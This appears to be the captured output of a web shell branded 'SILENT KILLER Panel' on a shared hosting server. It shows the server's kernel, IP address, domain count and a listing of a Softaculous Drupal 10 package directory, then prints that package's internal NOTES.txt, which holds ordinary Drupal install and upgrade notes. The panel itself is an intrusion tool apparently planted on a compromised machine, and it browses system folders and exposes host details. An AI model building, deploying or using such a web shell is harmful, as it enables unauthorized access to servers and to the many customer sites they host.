SILENT KILLERPanel

Current Path: > > var > softaculous > drupal10


Operation   : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Software     : Apache
Server IP    : 185.61.154.216 | Your IP: 216.73.216.44
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: //var/softaculous/drupal10

NameTypeSizeLast ModifiedActions
images Directory - -
php53 Directory - -
php56 Directory - -
php71 Directory - -
php81 Directory - -
php82 Directory - -
.htaccess File 685 bytes July 12 2023 09:07:36.
NOTES.txt File 2078 bytes August 05 2024 12:36:36.
README.txt File 278 bytes August 05 2024 12:36:36.
_htaccess File 486 bytes July 12 2023 09:07:36.
clone.php File 14694 bytes September 08 2025 12:37:40.
drupal10.sql File 2190823 bytes September 08 2025 07:35:42.
drupal10.zip File 33502872 bytes September 08 2025 07:35:42.
edit.php File 5166 bytes September 08 2025 12:37:40.
edit.xml File 433 bytes July 12 2023 09:07:36.
extend.php File 15241 bytes September 08 2025 12:37:40.
fileindex.php File 271 bytes September 22 2023 07:12:52.
import.php File 5814 bytes September 08 2025 12:37:40.
info.xml File 4010 bytes September 08 2025 07:35:42.
install.js File 1354 bytes August 05 2024 12:36:36.
install.php File 9612 bytes September 08 2025 12:37:40.
install.xml File 1126 bytes July 12 2023 09:07:36.
md5 File 1482 bytes September 08 2025 12:37:40.
settings.php File 37000 bytes November 13 2024 10:42:50.
update_pass.php File 541 bytes August 05 2024 12:36:36.
upgrade.php File 4542 bytes September 08 2025 12:37:40.
upgrade.xml File 309 bytes July 12 2023 09:07:36.

Reading File: //var/softaculous/drupal10/NOTES.txt

1) Default Timezone should be ZERO I.e UTC +0000 and keep default country NONE
2) Leave "Check for updates automatically ", "Email notifications"  as it is.
3) Keep "use database default" in Transaction isolation level in manual installation.
4) Delete all watchdog INSERTS And also change its AUTO INCREMENT =1 ; 
5) Delete this table inserts from following tables cache_access_policy, cache_bootstrap, cache_config, cache_container, cache_data, cache_default, cache_discovery, cache_entity, cache_menu, cache_render. Drupal creates it on login
6) No need to generate system.js_cache_files and drupal_css_cache_files. It's same for all install
7) If any new root level folder added in drupal package then add its entry in upgrade.php apart from vendor and core. Only 'core', 'vendor' and root level files need to be deleted before upgrade. (https://api.drupal.org/api/drupal/core!UPGRADE.txt/8)
8) Do not change "default_config_hash" from sql since it remains same across installations for same version.
9) Set the value for temporary as s:0:"" in `config` table for "system.file" row. On our servers we get it as /tmp but on some servers /tmp is not accessible due to open_basedir which causes temporary file creation issue. So if we set it as empty Drupal will generate it automatically when needed(Not needed since version 8.8.0).
10) Remove serialized entries of "twig_extension_hash" and "twig_cache_prefix" from key_value table as it creates itself.
11) PHP REQUIREMENT LINK: https://www.drupal.org/docs/system-requirements/php-requirements
12) Can not add languages at the moment as it needs to enable (language, content translation and interface translation modules) which adds too many entries in SQL
13) Drupal Minor upgrade Guide: https://www.drupal.org/docs/updating-drupal/updating-drupal-core-manually
14) We have disabled Major upgrade (i.e from 9.5.0 to 10.x) as it requires migration. We need to check if we can give it via Softaculous or not.
https://www.drupal.org/docs/upgrading-drupal/upgrading-from-drupal-8-or-later/upgrading-from-drupal-9-to-drupal-10-0

SILENT KILLER Tool